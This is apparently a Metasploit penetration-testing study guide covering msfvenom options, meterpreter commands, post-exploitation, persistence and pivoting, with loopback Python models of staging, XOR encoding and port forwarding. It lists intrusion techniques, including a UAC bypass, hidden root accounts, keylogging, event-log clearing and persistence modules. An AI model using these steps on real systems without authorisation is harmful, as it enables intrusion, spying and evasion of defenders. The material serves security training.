The Metasploit Framework (MSF) is an open-source, robust penetration testing and exploitation framework that is used by penetration testers and security researchers worldwide.
Essential Terminology
Exploit - A module that takes advantage of a vulnerability to get code running on the target. An exploit is typically paired with a payload.
Payload - Code that MSF delivers and executes on the target after successful exploitation. An example of a payload is a reverse shell, which initiates a connection from the target system back to the attacker.
Encoder - Transforms the payload bytes so that the original bytes do not appear in what is delivered, with a small decoder stub prepended to restore them at run time. Encoders were designed to avoid bad characters (for example null bytes) in an exploit buffer; they are also used in an attempt to evade signature-based AV, but the decoder stubs themselves are well known to AV vendors, so encoding alone rarely defeats modern detection. For example, x86/shikata_ga_nai is a polymorphic XOR additive-feedback encoder commonly used for x86 Windows payloads.
NOPs - No-operation instructions (NOP generators) used to pad payloads to a consistent size and to improve stability when execution does not land exactly at the first byte of the payload (a NOP sled).
Auxiliary - A module that performs supporting functionality such as port scanning, enumeration, fuzzing or brute-forcing; auxiliary modules do not deliver a payload.
Unstaged (single/inline) : The complete payload is sent to the target in one piece along with the exploit. Larger, but it needs no second download.
Staged : The payload is split in two. The first part (stager) is small; it establishes the connection back to the attacker, downloads the second part (stage) over that connection and executes it.
The Meterpreter (Meta-Interpreter) payload is an advanced, multi-functional payload that runs entirely in memory on the target system, which makes it harder to detect. It communicates over the stager's socket and gives the attacker an interactive command interpreter on the target that supports running system commands, file system navigation, keylogging and much more.
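The staged handoff described above, modelled in Python as an added example (this is not Metasploit's own code). The real reverse_tcp stager is a few dozen bytes of machine code that connects to LHOST:LPORT, reads a 4-byte little-endian length, reads that many bytes of stage and jumps into them; here the stage is a constructed Python source string so the exchange can be run on loopback. An unstaged payload would simply be the whole of STAGE delivered by the exploit itself, with no handshake.

```python
import socket
import struct
import threading

# Constructed stand-in for the "stage". In Metasploit this is position-independent
# machine code (e.g. the Meterpreter loader); here it is Python source so the
# handoff can be shown end to end.
STAGE = b"def stage_main():\n    return 'stage executed'\n"


def serve_stage(listener, stage):
    """Attacker side (the exploit/multi/handler role): accept the stager's
    connection and send a 4-byte little-endian length followed by the stage."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(struct.pack("<I", len(stage)) + stage)


def recv_exact(sock, n):
    """Read exactly n bytes; a real stage arrives in many TCP segments."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed before the full stage arrived")
        buf += chunk
    return bytes(buf)


def stager(lhost, lport):
    """Target side: the small first part. Connect back, read the length,
    read the stage, then transfer control to it."""
    with socket.create_connection((lhost, lport)) as s:
        (size,) = struct.unpack("<I", recv_exact(s, 4))
        stage = recv_exact(s, size)
    namespace = {}
    exec(stage.decode(), namespace)  # stand-in for jumping into the stage buffer
    return namespace["stage_main"]()


def run_demo(stage=STAGE):
    """Run handler and stager on loopback; returns what the stage produced."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS choose a free LPORT
    listener.listen(1)
    lport = listener.getsockname()[1]
    handler = threading.Thread(target=serve_stage, args=(listener, stage))
    handler.start()
    try:
        return stager("127.0.0.1", lport)
    finally:
        handler.join()
        listener.close()


if __name__ == "__main__":
    print(run_demo())
```

The length-prefix step is why a staged payload must be caught by a handler configured with the same payload name: a plain netcat listener would answer the stager's connection but never send a stage, so the session hangs.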
Workspaces allow you to keep track of all your hosts, scans and activities and are extremely useful when conducting penetration tests, as they let you sort and organize your data by target or organization.
Usage:
1. Run an nmap scan and store the output in XML format: nmap -sV -oX scan.xml TARGET
2. Create (and switch to) a workspace in msfconsole: workspace -a NAME (workspace on its own lists workspaces)
3. Import the results into the current workspace: db_import scan.xml
OR
Use db_nmap inside msfconsole to run nmap and record the results directly in the current workspace: db_nmap -sV TARGET
Database commands:
hosts : Hosts from the imported or scanned results
services : Services discovered
vulns : Vulnerabilities recorded by modules against those hosts
Run the following command in a meterpreter session to add a route to an internal subnet through that session:
run autoroute -s SUBNET -n NETMASK (for example run autoroute -s 10.10.10.0 -n 255.255.255.0; route print shows the active routes)
FTP
SSH
SMB
SMTP
HTTP
MySql
Generating msfvenom payload
msfvenom --list payloads : List all payloads
msfvenom --list formats : List all output formats
Staged payload : PLATFORM/meterpreter/TRANSPORT, e.g. windows/meterpreter/reverse_tcp (slash between meterpreter and the transport)
Unstaged payload : PLATFORM/meterpreter_TRANSPORT, e.g. windows/meterpreter_reverse_tcp (underscore)
-p : payload name
LHOST= : attacker IP the payload connects back to
LPORT= : attacker port
-f : output format, e.g. exe, elf, raw, c
-a : architecture (x86 or x64)
-e : encoder (e.g. -e x86/shikata_ga_nai)
-i : number of encoding iterations
-b : bad characters the output must not contain (e.g. -b '\x00')
-x : use an existing executable as a template and inject the payload into it
-k : keep the template's original functionality; the payload runs in a separate thread
-o : write the output to a file
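What -e, -i and -b actually do to the bytes, as an added Python example rather than msfvenom's own code. It implements a byte-wide XOR additive-feedback scheme of the same family as x86/shikata_ga_nai (which works on 32-bit words and prepends a machine-code decoder stub; here the decoder is a Python function, so this is a model, not the real encoder). Multiple iterations chain rounds with different keys, and find_keys_avoiding mirrors the -b search: try keys until the encoded output contains none of the bad characters. The shellcode bytes are the well-known x86 execve("/bin/sh") sequence, used only as sample input; all function names are hypothetical.

```python
# Sample input: classic 25-byte x86 Linux execve("/bin/sh") shellcode.
SHELLCODE = (b"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1"
             b"\xb0\x0b\xcd\x80")


def encode_round(payload, key):
    """One encoding pass: XOR each byte with a running 8-bit key, then add the
    plaintext byte into the key (additive feedback), so identical plaintext
    bytes encode differently depending on everything before them."""
    out = bytearray()
    k = key & 0xFF
    for b in payload:
        out.append(b ^ k)
        k = (k + b) & 0xFF
    return bytes(out)


def decode_round(encoded, key):
    """Inverse of encode_round; this is what the decoder stub does at run time."""
    out = bytearray()
    k = key & 0xFF
    for c in encoded:
        b = c ^ k
        out.append(b)
        k = (k + b) & 0xFF
    return bytes(out)


def encode(payload, keys):
    """-i N is modelled as N chained rounds, each with its own key."""
    data = payload
    for k in keys:
        data = encode_round(data, k)
    return data


def decode(encoded, keys):
    """Rounds are undone in reverse order, innermost key last."""
    data = encoded
    for k in reversed(keys):
        data = decode_round(data, k)
    return data


def find_keys_avoiding(payload, badchars, rounds=1):
    """Model of -b: search the key space until the encoded bytes contain no bad
    character. Returns (keys, encoded) or (None, None) if no key works, which
    is the situation in which msfvenom reports that encoding failed."""
    for key in range(1, 256):
        keys = [(key + 0x21 * i) & 0xFF for i in range(rounds)]
        enc = encode(payload, keys)
        if not any(b in enc for b in badchars):
            return keys, enc
    return None, None


if __name__ == "__main__":
    keys, enc = find_keys_avoiding(SHELLCODE, b"\x00\x0a", rounds=2)
    print("keys", keys)
    print("encoded", enc.hex())
    print("roundtrip ok", decode(enc, keys) == SHELLCODE)
```

Note what this does and does not buy: the payload bytes change, but the decoder in front of them is the same for every output, which is exactly the part a signature can match. That is why encoders are reliable for bad-character avoidance and unreliable for AV evasion.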
sessions : Show all ongoing sessions
  -l : list active sessions
  -i ID : interact with session ID
  -k ID : kill session ID
  -n NAME : name (or rename) a session, used together with -i ID
  -C CMD : run a meterpreter command on the session given with -i (or on all sessions)
Meterpreter commands:
sysinfo : system information
getuid : the user the session is running as
download FILE : download a file from the target
upload FILE : upload a file to the target
checksum md5 FILE : MD5 checksum of a file on the target
getenv PATH : read an environment variable
search -f PATTERN -d DIR : search for files (-f file name or extension pattern, -d directory to search in)
shell : drop to a native command shell on the target
ps : process list
migrate PID : migrate into another process
execute -f CMD : execute a command on the target
Upgrade a plain command shell session to meterpreter: use post/multi/manage/shell_to_meterpreter (set SESSION to the shell's ID, then run), or use the shortcut sessions -u ID.
post/windows/manage/migrate : migrate the session into another process
post/windows/manage/archmigrate : migrate into a process whose architecture matches the native OS (e.g. from an x86 meterpreter on 64-bit Windows into an x64 process)
post/windows/gather/win_privs : Gather the current user's Windows privileges
post/windows/gather/enum_logged_on_users : Gather information about logged-on users
post/windows/gather/checkvm : Check whether the machine is a virtual machine
post/windows/gather/enum_applications : Enumerate installed applications and their versions
post/windows/gather/enum_av_excluded : Folders excluded from antivirus scanning
post/windows/gather/enum_computers : Enumerate computers in the AD domain
post/windows/gather/enum_patches : Enumerate patches installed on the system
post/windows/gather/enum_shares : Enumerate shares configured on the target
exploit/windows/local/bypassuac_injection : UAC bypass (the payload architecture must match the target process architecture)
exploit/windows/local/persistence_service : Add persistence by installing a service
post/windows/manage/enable_rdp : Enable RDP on the system
Use net user USERNAME PASSWORD to set a user's password (net user USERNAME PASSWORD /add creates a new local user).
Use xfreerdp /u:USERNAME /p:PASSWORD /v:HOST to connect over RDP.
In a meterpreter session (migrate into a process on the user's desktop, typically explorer.exe, first; the keylogger only sees keystrokes of the desktop the current process belongs to):
keyscan_start : Start keylogging
keyscan_dump : Dump captured keystrokes
keyscan_stop : Stop keylogging
Logs can be viewed in Event Viewer. Clearing them requires elevated privileges. Use clearev in meterpreter to clear the Application, System and Security event logs. Note that clearing the Security log itself generates an "audit log was cleared" event (ID 1102), which defenders commonly alert on.
Linux post-exploitation: modules and commands used to gather information after exploitation.
Run ps aux to list running processes and check whether any service is vulnerable to a known local exploit.
exploit/unix/local/chkrootkit : Gain root through a vulnerable chkrootkit installation (versions 0.49 and earlier execute /tmp/update as root when chkrootkit runs from cron; the session needs a writable /tmp)
Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.
Add a user with root privileges, named like a service account (e.g. ftp) so it is less conspicuous:
useradd -m -s /bin/bash USERNAME
passwd USERNAME
usermod -aG root USERNAME   (add to the root group)
usermod -u 0 -o USERNAME    (give the account UID 0, i.e. root; -o permits the duplicate UID)
exploit/linux/local/cron_persistence : Manipulate cron jobs for persistence
exploit/linux/local/service_persistence : Add persistence via a system service
post/linux/manage/sshkey_persistence : Add an SSH key for persistence
Pivoting is a post exploitation technique that involves utilizing a compromised host to attack other systems on the compromised host’s private internal network.
run autoroute -s SUBNET -n NETMASK : add a route to the internal subnet through the current session (route print shows the active routes)
Port forwarding via the meterpreter session: portfwd add -l LOCAL_PORT -p REMOTE_PORT -r REMOTE_HOST forwards LOCAL_PORT on the attacker machine to REMOTE_HOST:REMOTE_PORT on the internal network, so tools outside MSF can reach the internal service through localhost.
When running a module against a host reached through the pivot, use a bind payload (e.g. windows/meterpreter/bind_tcp): the framework connects to the target through the route, and LHOST is not used. A reverse payload would require the internal host to reach the attacker directly, which it usually cannot, unless a reverse port forward (portfwd add -R) is set up on the pivot.
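What portfwd add -l LOCAL_PORT -p REMOTE_PORT -r REMOTE_HOST does, as an added Python example (this is not meterpreter's code): a listener on the attacker's side that relays every byte to an internal host and back. In the real case the relay runs through the meterpreter session, so the connection to REMOTE_HOST originates from the pivot; here both ends are on loopback, with a constructed echo service standing in for the internal host. The function names are hypothetical.

```python
import socket
import threading


def pump(src, dst):
    """Copy bytes from src to dst until src closes, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def serve_forward(listener, remote_host, remote_port):
    """Accept clients on the local port and relay each to remote_host:remote_port,
    which in the real case is a host only reachable from the pivot."""
    while True:
        try:
            client, _ = listener.accept()
        except OSError:  # listener closed: forward removed
            return
        try:
            remote = socket.create_connection((remote_host, remote_port))
        except OSError:
            client.close()
            continue
        threading.Thread(target=pump, args=(client, remote), daemon=True).start()
        threading.Thread(target=pump, args=(remote, client), daemon=True).start()


def portfwd_add(local_port, remote_host, remote_port):
    """Model of `portfwd add -l local_port -p remote_port -r remote_host`.
    Returns the listening socket; closing it removes the forward."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind(("127.0.0.1", local_port))
    listener.listen(5)
    threading.Thread(target=serve_forward,
                     args=(listener, remote_host, remote_port), daemon=True).start()
    return listener


def start_internal_service():
    """Constructed stand-in for the internal host: an echo server that prefixes
    replies with b"echo:". Returns the port it listens on."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def run():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(b"echo:" + data)

    threading.Thread(target=run, daemon=True).start()
    return srv.getsockname()[1]


def demo(message=b"hello"):
    """Talk to the internal service only via the forwarded local port."""
    remote_port = start_internal_service()
    listener = portfwd_add(0, "127.0.0.1", remote_port)  # port 0: pick a free local port
    local_port = listener.getsockname()[1]
    try:
        with socket.create_connection(("127.0.0.1", local_port)) as c:
            c.sendall(message)
            return c.recv(4096)
    finally:
        listener.close()


if __name__ == "__main__":
    print(demo())
```

The point for pivoting is that anything that can speak TCP to 127.0.0.1:LOCAL_PORT (nmap, a browser, an SSH client) now reaches the internal service without knowing about the route, which is why portfwd is the usual way to bring non-Metasploit tooling through a pivot.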
GUI version of msfconsole